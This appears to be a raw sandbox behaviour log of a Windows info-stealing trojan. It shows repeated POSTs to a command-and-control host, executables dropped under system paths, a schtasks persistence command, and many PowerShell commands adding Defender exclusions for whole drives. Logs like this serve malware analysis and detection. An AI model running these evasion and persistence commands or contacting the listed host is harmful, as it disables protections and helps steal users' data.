                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 1948Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 1948Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 733812cm.n9shteam.in Content-Length: 1932 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 733812cm.n9shteam.in Content-Length: 2520 Expect: 100-continue Connection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: 733812cm.n9shteam.in
Source: unknown HTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 733812cm.n9shteam.in Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe File created: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe File created: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe\:Zone.Identifier:$DATA
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe File created: C:\Windows\CbsTemp\bd46efcfcb9ccc
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: c:\Windows\System32\CSC6D484021F1A3499F944D7EA066CF3EF7.TMP
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: c:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File deleted: C:\Windows\System32\CSC6D484021F1A3499F944D7EA066CF3EF7.TMP
Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\AKEAUBbV.log C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
Source: 9XHFe6y4Dj.exe, 00000048.00000002.2493872082.000000000288B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 9XHFe6y4Dj.exe
Source: 9XHFe6y4Dj.exe, 0000004A.00000002.2617268996.00000000034DC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 9XHFe6y4Dj.exe
Source: 9XHFe6y4Dj.exe, 0000004A.00000002.2617268996.0000000003462000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 9XHFe6y4Dj.exe
Source: 9XHFe6y4Dj.exe, 0000004E.00000002.2896718557.00000000029EC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 9XHFe6y4Dj.exe
Source: 9XHFe6y4Dj.exe, 0000004E.00000002.2896718557.0000000002972000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 9XHFe6y4Dj.exe
Source: 9XHFe6y4Dj.exe Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 9XHFe6y4Dj.exe
Source: 9XHFe6y4Dj.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 9XHFe6y4Dj.exe, PxYyBN7eGEjABOahheG.cs Cryptographic APIs: 'CreateDecryptor'
Source: classification engine Classification label: mal100.spre.troj.spyw.expl.evad.winEXE@86/167@1/2
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe File created: C:\Program Files\Windows Defender\Platform\tqeRXJHxPWPPoiNqjJeEYdv.exe
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe File created: C:\Users\user\Desktop\JTIguxNU.log
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Mutant created: NULL
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-dVH10D4cdJAzs948YjfF
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2820:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4400:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7216:120:WilError_03
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe File created: C:\Users\user\AppData\Local\Temp\tmiybkuk
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lE7emhVBWP.bat"
Source: 9XHFe6y4Dj.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 9XHFe6y4Dj.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe File read: C:\Users\desktop.ini
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                            Source: DTEg3zrlZw.71.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                            Source: 9XHFe6y4Dj.exe ReversingLabs: Detection: 65%
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe File read: C:\Users\user\Desktop\9XHFe6y4Dj.exe
                            Source: unknown Process created: C:\Users\user\Desktop\9XHFe6y4Dj.exe "C:\Users\user\Desktop\9XHFe6y4Dj.exe"
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tmiybkuk\tmiybkuk.cmdline"
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9645.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCBECAF1EB4DD4ACB9C3DAD38B7F1421.TMP"
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hbljmznv\hbljmznv.cmdline"
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES97EB.tmp" "c:\Windows\System32\CSC6D484021F1A3499F944D7EA066CF3EF7.TMP"
                            Source: unknown Process created: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe "C:\Program Files (x86)\windows mail\tqeRXJHxPWPPoiNqjJeEYdv.exe"
                            Source: unknown Process created: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe "C:\Program Files (x86)\windows mail\tqeRXJHxPWPPoiNqjJeEYdv.exe"
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "9XHFe6y4Dj9" /sc MINUTE /mo 8 /tr "'C:\Users\user\Desktop\9XHFe6y4Dj.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows mail\tqeRXJHxPWPPoiNqjJeEYdv.exe'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\tqeRXJHxPWPPoiNqjJeEYdv.exe'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\tqeRXJHxPWPPoiNqjJeEYdv.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\Platform\tqeRXJHxPWPPoiNqjJeEYdv.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9XHFe6y4Dj.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lE7emhVBWP.bat"
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknown Process created: C:\Users\user\Desktop\9XHFe6y4Dj.exe C:\Users\user\Desktop\9XHFe6y4Dj.exe
                            Source: unknown Process created: C:\Users\user\Desktop\9XHFe6y4Dj.exe C:\Users\user\Desktop\9XHFe6y4Dj.exe
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: unknown Process created: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe "C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe"
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Desktop\9XHFe6y4Dj.exe "C:\Users\user\Desktop\9XHFe6y4Dj.exe"
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Source: unknown Process created: C:\Users\user\Desktop\9XHFe6y4Dj.exe "C:\Users\user\Desktop\9XHFe6y4Dj.exe"
                            Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                            Source: unknown Process created: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe "C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe"
                            Source: unknown Process created: C:\Users\user\Desktop\9XHFe6y4Dj.exe "C:\Users\user\Desktop\9XHFe6y4Dj.exe"
                            Source: unknown Process created: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe "C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe"
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9645.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCBECAF1EB4DD4ACB9C3DAD38B7F1421.TMP"
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, sspicli.dll, ktmw32.dll, ntmarta.dll, wbemcomn.dll, amsi.dll, userenv.dll, propsys.dll, dlnashext.dll, wpdshext.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, version.dll, kernel.appcore.dll, mscoree.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, kernel.appcore.dll
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, sspicli.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
